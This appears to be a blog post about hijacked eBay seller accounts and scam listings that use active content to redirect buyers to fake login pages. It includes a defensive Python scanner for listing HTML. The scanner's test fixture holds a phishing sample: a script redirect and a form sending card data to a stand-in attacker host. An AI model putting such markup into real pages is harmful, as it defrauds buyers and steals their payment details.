I’ve been a member and seller on eBay with the same user ID since 1998, and regularly turn to the site when I want to buy or sell just about anything you can mail. But recently there have been attacks by criminal gangs on user accounts which eBay seems to be unable or unwilling to inhibit. These gangs take over an innocent user’s account, possibly by tricking them out of their username and password (or possibly through an internal eBay vuln, which I think is more likely), and then use that account to sell non-existent items (and collect the money) and to seek and find more victims.
Many of the compromised accounts have 100% positive feedback and had previously sold hundreds of items. One victim who had his account hijacked says he was locked out of his account, and then later billed “around $50” by eBay for seller’s fees on items he had never heard of. When customers click on a scammer’s listing, they are redirected to a professional, official-looking page which asks them to log in and ‘confirm’ their credit card and bank account details! The items ostensibly for sale in these compromised listings range from smartphones and TVs to laptops and bicycles.
“We have no current plans to remove active content from eBay. However, we will continue to review all site features and content in the context of the benefit they bring our customers as well as overall site security.”
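The redirect described above depends on “active content” (script, handlers, off-site forms) being allowed inside a listing. As an added example that is not eBay’s code, here is a scanner a marketplace could run over listing HTML before publishing it; the trusted hostname and the two sample listings are constructed for illustration.

```python
# Added example: flag active content in listing HTML that could send a buyer
# to a phishing page. Not eBay's code; the host and samples are constructed.
from html.parser import HTMLParser
from urllib.parse import urlparse

ACTIVE_TAGS = {"script", "iframe", "object", "embed", "applet"}


class ActiveContentScanner(HTMLParser):
    """Records one finding per active-content construct seen in a listing."""

    def __init__(self, trusted_host):
        super().__init__()
        self.trusted_host = trusted_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        attrs = {name: (value or "") for name, value in attrs}
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs.items():
            if name.startswith("on"):  # onclick, onload, onerror, ...
                self.findings.append(f"{name} handler on <{tag}>")
            if value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} of <{tag}>")
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh redirect")
        if tag == "form":
            host = urlparse(attrs.get("action", "")).hostname
            if host and host != self.trusted_host:
                self.findings.append(f"form posts to off-site host {host}")


def scan_listing(html, trusted_host="example-marketplace.test"):
    """Return the list of active-content findings; empty means the listing is inert."""
    scanner = ActiveContentScanner(trusted_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples: a plain listing and one carrying a redirect plus a
# credential-harvesting form posting to an attacker-controlled host.
CLEAN_LISTING = '<p>Used laptop, 8GB RAM.</p><img src="https://example-marketplace.test/i/1.jpg">'
PHISH_LISTING = ('<p>New iPad</p><script>location="http://login-confirm.example/"</script>'
                 '<form action="http://login-confirm.example/verify"><input name="card"></form>')
```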
~~ Unsustainable Risk ~~
~~ Congratulations, Your Item Sold! ~~
One user whose account was used to make malicious listings with the XSS vuln said that his account had been “acting weird”. He was temporarily locked out, and listings were posted to his account by someone unknown to him.
“I kept getting emails saying, ‘Congratulations, you’ve sold your iPad’. Well, I hadn’t had an iPad for sale! I sent an email to eBay telling them there’s something wrong here, but they didn’t respond. Then they sent me an invoice saying I owe them $50 for ‘my selling fees’.”
eBay’s usual response when alarmed victims email them is, “Account takeovers generally occur as a result of a user disclosing their IDs or password. Unfortunately, it is a common practice of criminals to exploit well-known, trusted brand names like eBay to attract consumers and then lure them to a fake website or into other fraudulent situations.” In many cases eBay advises a victim to ‘clear their browser’s cookies and cache’, lol. Poor GrandMa…
Granted, there’s always a trade-off between making a site easy to use and attractive, versus making it secure. But eBay is far too susceptible to these sorts of attacks now and must move further toward security, for the protection of their giant, trusting user-base.